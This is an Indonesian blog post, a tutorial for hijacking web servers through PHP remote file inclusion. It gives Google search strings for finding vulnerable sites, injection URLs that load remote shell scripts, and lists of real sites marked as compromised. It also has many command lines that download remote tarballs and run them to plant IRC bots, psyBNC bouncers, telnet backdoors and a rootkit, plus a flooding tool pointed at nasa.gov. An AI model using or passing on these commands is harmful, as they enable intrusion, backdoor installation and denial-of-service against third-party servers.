Jumat, 09 Mei 2008

Tutorial psy dan bot injekan

kalian udah ga naeh kan chat di mirc...:D
kini saya mau kasih sedikit informasi dan ilmu kepada kalian, saya bukan nya ingin pamer tp saya hanya ingin membagi ilmu kepada kalian smw....
berikut ini tutorial cara menbuat psybnc dan boot :

1. uname -a;id <<== untuk melihat jenis server dan id
2. /sbin/ifconfig | grep inet<<== untuk melihat ip server
3. find / -type d -perm 777 |find . -type d -perm -2 -ls | find / -type d -user nobody <<== untuk melihat direktori yg tidak permission
denied
4. mkdir <<== untuk membuat direktori baru example: mkdir love
5. ls -alF <<== untuk melihat semua file dalam sebuah direktory
6. wget/lwp-download/curl -f -O <<== untuk mendownload file kita kedalam server

cara membuat bot dari server Linux:
1. cd /var/tmp;lwp-download http://www.geocities.com/kelelawar_kecil/kopler.tar.gz /
2. cd /var/tmp;tar -zxvf acz.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./dssl a.txt atau cd /var/tmp;./eggdrop -m a.txt tar -zxf

cara membuat bot dari server FreeBsd:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/aczbsd.tgz
2. cd /var/tmp;tar -zxvf aczbsd.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdop -m a.txt

cara load psy dari server Linux:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/AhoK.tar.gz
2. cd /var/tmp;tar -zxvf AhoK.tar.gz
3. cd /var/tmp;rm -fr AhoK.tar.gz
4. cd /var/tmp/AhoK;./config (IDENTD) (PORT)
5. cd /var/tmp/AhoK;./f**k
6. cd /var/tmp/AhoK;./run

1. cd /var/tmp;wget http://www.solsiden.info/psy/samsengpsy.tgz
2. cd /var/tmp;tar zxfv samsengpsy.tgz
3. cd /var/tmp;rm -fr samsengpsy.tgz
4. cd /var/tmp/samseng;./config (IDENTD) (PORT)
5. cd /var/tmp/samseng;./f**k
6. cd /var/tmp/samseng;./run

ada juga cara yang lebih mudah injek php tutorial nya :

*. Temukan target di google dengan keyword: allinurl:index.php?*.org option view itemid

extensi domain .org diatas dapat diganti menjadi extensi domain lain yang cukup populer seperti com,net,biz,org.edu, dll

Misalnya anda menemukan target: http://mitc.ictfund.org.eg/index.php?option=com_content&task=view&id=14&Itemid=30

*. Masukkan scripts injeksi: _REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
ke target yang udah kita dapatkan sebelumnya. Perlu diingat bahwa peletakan scripts diatas diletakkan sesudah php?

Sehingga target tersebut berubah menjadi:

http://mitc.ictfund.org.eg/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd

*. Target bisa ditemukan apabila pada target yang kita access menampilkan page berisi informasi spesifikasi server yang digunakan
oleh pemilik web serta kolom kecil untuk menginput semua commands yang akan kita gunakan.

Commands Yang Digunakan Di PHP Injection
========================================

*. Check Server

uname -a;id;uptime;wget;/sbin/ifconfig|grep inet

*. Bot dengan Netgate.tcl Untuk Allnetwork

cd /dev/shm;wget http://coke-coke.org/dataku/eggmbonx.tar.gz; tar -zxvf eggmbonx.tar.gz
cd /dev/shm/mbonx;./nadya conf (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./run conf [httpd]

*. Bot dengan RemajaBot di Allnet

cd /dev/shm;wget http://coke-coke.org/tcl/kuris.tar.gz;tar -zvxf kuris.tar.gz
cd /dev/shm/kuris/scripts;rm -rf kuris.tcl
cd /dev/shm/kuris/scripts;wget http://coke-coke.org/rado/kuris.tcl
cd /dev/shm/kuris/scripts;wget http://coke-coke.org/rado/kuris.tcl
cd /dev/shm/kuris;rm -rf chanary.conf
cd /dev/shm/kuris;./neesya a.txt (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./eggdrop -m a.txt

find / -type d -perm 777

*. Bot Dengan Tcl Sendiri Misalnya vhyan78.tcl

cd /dev/shm;wget http://coke-coke.org/php/vhyan.tar.gz;tar -zvxf vhyan.tar.gz
cd /dev/shm/bete/scripts;wget http://coke-coke.org/vhyan78.tcl

disini kita bisa wget semua tcl yang kita butuhkan sesuai fungsi eggdrop nantinya
Edit config eggdrop anda dimana config tersebut berisi semua tcl yang dibutuhkan
Upload config tersebut ke salah satu web free hosting seperti geocities.com atau 1asphost.com
contoh config dapat anda peroleh di http://coke-coke.org/php/vian.txt
kita misalkan nama config adalah vian.txt

cd /dev/shm/bete;./eggdrop -m vian.txt

*.Membuat psyBNC port 31310

cd /dev/shm;wget http://coke-coke.org/tcl/prepsyBNC.tar.gz;tar -zvxf prepsyBNC.tar.gz
cd /dev/shm/kaka;./psybnc

*.Membuat psyBNC dengan port dan ident tertentu

cd /dev/shm;wget geocities.com/ratapan_anak_angkat/shell/test.tgz.tgz; tar -zxvf test.tgz.tgz; cd redone; ./config Farhan 2206; ./fuck;./run

cd /var/tmp;curl -o vhyan.tar.gz http://geocities.com/aboutbahri/redone.tar.gz; tar -zxvf redone.tar.gz; cd redone; ./config Farhan 2206; ./fuck;./run

cd /var/tmp;wget http://geocities.com/aboutbahri/redone.tar.gz;tar -zxvf redone.tar.gz; cd redone; ./config Farhan 3351; ./fuck; ./run

* bot dalnet cd /var/www/html;curl -o vhyan.tar.gz http://geocities.com/dat.tar.gz; tar -zxvf dat.tar.gz; cd.dat; ./nadya a.txt laskar Q-max 64.34.72.171 aneka mahameru; ./eggdrop -m a.txt
cd /var/tmp;curl -o vhyan.tar.gz http://undem.no/tools/busuk.tgz; tar -zxvf busuk.tgz; cd .dat; ./nadya a.txt borju pLayBoy 82.192.84.188 arca mahameru; ./eggdrop -m a.txt
*.wget www.geocities.com/p3mula/sonix/psy.tar.gz

* cd /var/tmp;wget http://www.artofcar.ch/event/allnetwork.tar.gz;
tar -zvxf allnetwork.tar.gz;
cd kiss-allnet;
./nadya conf THIEF-05 kiss 66.235.201.105 kiss THIEF;
./eggdrop -m conf

* Liat IP /sbin/ifconfig

*.BackDoor Session

++ telnet:1979

wget http://www.freshstation.org/nina.php/as.tar.gz
cd /dev/shm;tar -zxvf as.tar.gz
cd /dev/shm/awyeah;./fuck
cd /dev/shmawyeah;./run


++ telnet 1666

cd /dev/shm;wget geocities.com/pinscasher/r0nin.zip;unzip r0nin.zip;chmod 777 r0nin;./r0nin

++ linux shv4

cd /dev/shm;wget http://geocities.com/remaja_crew/shv4.tar.gz;tar -zvxf shv4.tar.gz;cd shv4;./setup (PASSWORD) (PORT)

COMMANDS CADANGAN
==================

*. Jika wget tidak berfungsi

gunakan curl -o
misalnya untuk wget http://coke-coke.org/php/vhyan.tar.gz
menjadi: curl -o vhyan.tar.gz http://coke-coke.org/php/vhyan.tar.gz

*. Jika Dir tmp Tidak dapat Digunakan

gunakan cd /dev/shm sebagai dir pengganti cd /dev/shm

*. Mencari Dir yang terbuka

gunakan find / -type d -perm 777

cd /dev/shm;wget www.geocities.com/phaul10/evil.tar.gz
cd /dev/shm;tar -zvxf evil.tar.gz
cd /dev/shm/evil;./vadim 202.51.231.38 389 nasa.gov

=====ala cempe ====

cari: ./phplivehelper/blank.php

./blank.php <<< diganti /initiate.php?abs_path=http://we-dhuz.com/tmp/kek.jpg?

mis: livehelp2.inmagine.com/phplivehelper/blank.php
menjadi: livehelp2.inmagine.com/phplivehelper/initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd

contoh: http://www.strokerdvd.com/phplivehelper/initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd

masukkan: /initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd


===========

cd /var/tmp; wget http://coke-coke.org/rado/rado.tar.gz
cd /var/tmp;tar -zvxf rado.tar.gz
cd /var/tmp/.dat;./nadya a.txt (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./eggdrop -m a.txt


-= target =-
http://www.b9mat.com.sa/index.php?page
http://www.gay.gr/index.php?svc

-= baru =-
http://www.sirofin.gr/english/index.php?page=http://geocities.com/bodohaja/ibliz.txt?
http://www.diplomaline.gr/en/index.php?page=http://geocities.com/bodohaja/ibliz.txt?

-= selesai =-
http://www.magdas-kamares.gr/index.php?lang=http://www.geocities.com/hackingisart/vhyan.txt?
http://www.bhulisa.co.za/index.php?page=http://www.geocities.com/bodohaja/ibliz.txt? <=- gantung
http://www.legacys.co.za/index.php?page=http://www.geocities.com/bodohaja/ibliz.txt? <=- gantung
http://cg.nuku.com.tw/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
http://book.yhps.tn.edu.tw/nuke/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
http://student.hk/study/strategy/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung

the oblivion
the loft
Niagara
grind


- wget http://ricko03.freeprohost.com/cupu.tar.gz;
- atau lwp-download http://volvoline.de/cupu.tar.gz;
- tar zxvf cupu.tar.gz;
- cd cupu;
- ./nadya bot.txt borju plAybOy 66.234.201.105 arca mahameru;
- ./fuck;
- ./run bot.txt /usr/local/apache/bin/httpd
- ./eggdrop -m bot.txt

http://volvoline.de/cupu.tar.gz <=- bot
http://ricko03.freeprohost.com/BuaTpsyBNCnBOT.txt


http://www.cantdeny.com/brokendestiny/protection.php?action=logout&siteurl


selamat mencoba nya yah kawan-kawan....
klo da kekurangan nya tulung di tambahin yah ma kawan-kawan yang sudah lebih mengerti dari saya...

Tidak ada komentar: